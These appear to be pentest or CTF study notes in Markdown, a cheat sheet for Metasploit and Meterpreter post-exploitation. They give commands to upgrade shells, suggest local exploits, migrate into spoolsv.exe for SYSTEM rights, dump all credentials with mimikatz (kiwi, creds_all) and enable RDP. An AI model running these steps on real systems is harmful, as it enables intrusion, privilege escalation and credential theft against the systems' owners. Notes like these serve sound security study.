41 lines
974 B
Markdown
41 lines
974 B
Markdown
|
# Metasploit
|
||
|
|
* `-j` Run job in background
|
||
|
|
* `sessions -i 1` interactive session 1
|
||
|
|
|
||
|
|
## Meterpreter
|
||
|
|
|
||
|
|
* [CheatSheet](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)
|
||
|
|
* Upgrade shell
|
||
|
|
```sh
|
||
|
|
post/multi/manage/shell_to_meterpreter
|
||
|
|
```
|
||
|
|
* `execute` command
|
||
|
|
* `search` files
|
||
|
|
* `download` and `upload` files
|
||
|
|
|
||
|
|
# Metasploit after gaining foothold
|
||
|
|
|
||
|
|
* Meterpreter shell is opened on target. Run exploit suggester
|
||
|
|
```sh
|
||
|
|
run post/multi/recon/local_exploit_suggester
|
||
|
|
```
|
||
|
|
* Decide on your exploit and `background` the meterpreter.
|
||
|
|
* Use the exploit.
|
||
|
|
```sh
|
||
|
|
use <path/to/exploit>
|
||
|
|
```
|
||
|
|
* Fill options like `session` and run the exploit
|
||
|
|
|
||
|
|
### Privilige Escalation on Windows Using Metasploit
|
||
|
|
* Find process with higher privs and migrate to it. Example `spoolsv.exe`.
|
||
|
|
```sh
|
||
|
|
migrate -N spoolsv.exe
|
||
|
|
```
|
||
|
|
* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds
|
||
|
|
```sh
|
||
|
|
load kiwi
|
||
|
|
help
|
||
|
|
creds_all
|
||
|
|
```
|
||
|
|
* Enable RDP via `run post/windows/manage/enable_rdp`
|